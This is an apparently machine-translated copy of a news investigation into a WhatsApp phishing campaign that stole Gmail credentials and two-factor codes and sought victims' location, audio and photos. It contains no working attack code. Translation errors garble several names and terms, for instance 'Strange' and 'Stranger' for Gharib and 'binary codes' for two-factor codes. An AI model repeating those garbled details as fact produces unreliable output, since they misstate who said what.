Physical Address
304 North Cardinal St.
Dorchester Center, MA 02124
On Tuesday, an Iranian activist based in the United Kingdom Nariman Gharib He tweeted redacted screenshots of a phishing link sent to him via WhatsApp message.
“Do not click on suspicious links,” Gharib warned. The activist, who follows the digital side of Iranian protests from afar, said the campaign targeted people involved in Iran-related activities, like himself.
This hacking campaign comes at a time when Iran is struggling The longest nationwide Internet outage in its historyAs anti-government protests – and violent crackdowns – rage across the country. Given that Iran and its closest adversaries are very active in offensive cyberspace (read: hacking people), we wanted to learn more.
Strange shared the full phishing link with TechCrunch shortly after publishing it, allowing us to capture a copy of the source code of the phishing webpage used in the attack. Him too Share your findings in writing.
TechCrunch analyzed the source code of the phishing page, and with additional input from security researchers, we believe the campaign aims to steal Gmail and other online credentials, hack WhatsApp accounts, and conduct surveillance by stealing location data, photos, and audio recordings.
However, it is unclear whether the hackers were government-linked agents, spies, or cybercriminals — or all three.
TechCrunch also identified a way to view a real-time copy of all victims’ responses saved on the attacker’s server, which were left exposed and accessible without a password. This data revealed dozens of victims who had inadvertently entered their credentials into the phishing site and were likely later hacked.
The list includes a Middle Eastern academic working in national security studies; the head of an Israeli drone maker; A senior minister in the Lebanese government; At least one journalist; and people in the United States or who have US phone numbers.
TechCrunch is publishing our findings after fact-checking a significant portion of a bizarre report. The phishing site is now down.
Inside the attack chain
According to Ghareeb, the WhatsApp message he received contained a suspicious link, which led to a phishing website being loaded in the victim’s browser.
The link explains that the attackers relied on a dynamic DNS provider called DuckDNS for their phishing campaign. Dynamic DNS providers allow people to connect to easy-to-remember web addresses – in this case, a duckdns.org Subdomain – to a server whose IP address may change frequently.
It’s not clear whether the attackers shut down the phishing site on their own, or were caught and cut off by DuckDNS. We reached out to DuckDNS to inquire, but owner Richard Harper asked us to submit an abuse report instead.
From what we understand, the attackers used DuckDNS to hide the real location of the phishing page, to make it look like a real WhatsApp link.
The phishing page is already hosted on alex-fabow.onlinea domain that was first registered in early November 2025. This domain contains several other related domains hosted on the same dedicated server, and these domain names follow a pattern that suggests the campaign also targeted other virtual meeting room providers, such as meet-safe.online and whats-login.online.
We’re not sure what happens while a DuckDNS link loads in a victim’s browser, or how the link identifies the specific phishing page to load. It is possible that the DuckDNS link is redirecting the target to a specific phishing page based on the information it captures from the user’s device.
The phishing page will not load in our web browser, preventing us from interacting with it directly. However, reading the source code of the page allowed us to better understand how the attack worked.
Phishing for Gmail credentials and phone number
Depending on the target, clicking on the phishing link will open a fake Gmail login page, or ask for their phone number, starting an attack flow aimed at stealing their password and two-factor authentication code.
But the phishing page’s source code had at least one flaw: TechCrunch found that by modifying the phishing page’s URL in our web browser, we could view a file on the attacker’s servers that was storing logs of each victim who entered their credentials.
The file contains more than 850 records of information provided by victims during the attack flow. These logs detail every part of the phishing flow the victim was in. This included copies of usernames and passwords that victims entered on the phishing page, as well as invalid entries and their binary codes, effectively acting as a keystroke logger.
The logs also included each victim’s user agent, which is a string of text identifying the operating system and browser versions used to view websites. This data shows that the campaign is designed to target Windows, macOS, iPhone, and Android users.
The exposed file allowed us to follow the attack flow step-by-step for each victim. In one case, the exposed file shows the victim clicking on a malicious link, which opens a page resembling a Gmail login window. The log shows the victim entering his email credentials multiple times until he enters the correct password.
Records show the victim himself entering a two-factor authentication code that was sent to him via text message. We can know this because Google sends two-factor codes in a certain format (usually G-xxxxxxwhich includes a six-digit digital code).
Hijack WhatsApp and extract browser data
Beyond stealing credentials, this campaign also appears to enable surveillance by tricking victims into sharing their location, voice, and photos from their devices.
In Stranger’s case, clicking on the link in the phishing message opened a fake WhatsApp-themed page in his browser, displaying a QR code. The lure is intended to trick the target into scanning the code on their device, ostensibly to gain access to a virtual meeting room.
Gharib said the QR code was generated by the attacker, and scanning or tapping it would instantly link the victim’s WhatsApp account to a device controlled by the attacker, giving him access to the victim’s data. This is an attack technique that has long been known to be abused The feature of connecting the WhatsApp deviceAnd he was similarly abused Targeting Signal messaging app users.
We asked Granite founder Runa Sandvika security researcher who works to help vulnerable individuals with their security, examined a copy of the phishing page’s code and learned how it worked.
Sandvik found that when the page loads, the code will trigger a browser notification asking the user for permission to access their site (via navigator.geolocation), as well as images and sound (navigator.getUserMedia).
If you agree, the browser will immediately send the person’s coordinates to the attacker, who is able to determine the victim’s location. The page will then continue to share the victim’s location data every few seconds, as long as the page remains open.
The code also allowed attackers to record bursts of audio and take photos every three to five seconds using the device’s camera. However, we did not see any location, audio or image data collected on the server.
Ideas about casualties, timing, and attribution
We do not know who is behind this campaign. What is clear is that the campaign was successful in stealing credentials from victims, and it is possible that the phishing campaign will resurface.
Although the identities of some of the people in this group of victims who were targeted are known, we do not have enough information to understand the nature of the campaign. The number of victims compromised by this campaign (that we know of) is fairly low – less than 50 individuals – and affects ordinary people in the Kurdish community, as well as academics, government officials, business leaders and other high-profile figures across the wider Iranian diaspora and the Middle East.
The number of victims may be much higher than we know, which may help us understand who was targeted and perhaps why.
The case is that this could be a government-backed actor
It is unclear what prompted hackers to steal people’s credentials and hijack their WhatsApp accounts, which may also help determine who is behind this hacking campaign.
For example, a government-backed group might want to steal the email password and binary codes of a high-value target, such as a politician or journalist, so they can download private and confidential information.
This would make sense since Iran is currently completely isolated from the outside world, and obtaining information inside or outside the country is a challenge. It is reasonable for the Iranian government, or any foreign government with interests in Iranian affairs, to want to know who influential individuals associated with Iran are communicating with, and what about them.
As such, the timing of this phishing campaign and who it appears to be targeting could indicate an espionage campaign aimed at trying to gather information about a narrow list of people.
We asked Gary Miller, a security researcher at Citizen Lab and a mobile espionage expert, to review the phishing code and some of the data exposed from the attacker’s server.
Miller said that the attack “certainly bears the hallmarks of a phishing campaign linked to the Iranian Revolutionary Guard,” referring to Highly targeted email breaches It was carried out by Iran’s Islamic Revolutionary Guard Corps, a faction of the Iranian military known for carrying out cyberattacks. Miller pointed to a mix of indicators, including the international scope of victim targeting, credential theft, and misuse of popular messaging platforms like WhatsApp, Social engineering techniques Used in phishing link.
In the event that this may be a financially motivated actor
On the other hand, a financially motivated hacker could use the same stolen Gmail password and binary code of another high-value target, such as a company executive, to steal private, sensitive business information from their inbox. The hacker can also forcefully reset the passwords to the victim’s cryptocurrency and bank accounts to empty their wallets.
However, the campaign’s focus on accessing the victim’s location and device media is unusual for a financially motivated actor, who may not use images and audio recordings often.
We asked Ian Campbell, a threat researcher at DomainTools, who helps analyze public internet logs, to take a look at the domain names used in the campaign to help understand when they were first set up, and whether these domains are connected to any other known or previously identified infrastructure.
Campbell found that although the campaign targeted victims amid ongoing nationwide protests in Iran, the infrastructure for it had been in place for weeks. He added that most of the domains associated with this campaign were registered in early November 2025, and one related domain was created months ago in August 2025. Campbell described the domains as moderate to high risk, and said they appeared to be linked to a financially motivated cybercrime operation.
An additional problem is that the Iranian government has been known to outsource cyberattacks to criminal hacking groups, perhaps to protect its own involvement in hacking operations against its own citizens. The US Treasury has Iranian companies that have been sanctioned in the past For acting as fronts for the IRGC and carrying out cyberattacks, such as conducting targeted phishing and social engineering attacks.
As Miller notes, “This drives home the point that clicking on spam WhatsApp links, no matter how convincing, is a high-risk and unsafe practice.”
To communicate securely with this reporter, you can contact him using the Signal app via the username: zackwhittaker.1337
Lorenzo Franceschi-Bicchirai contributed reporting.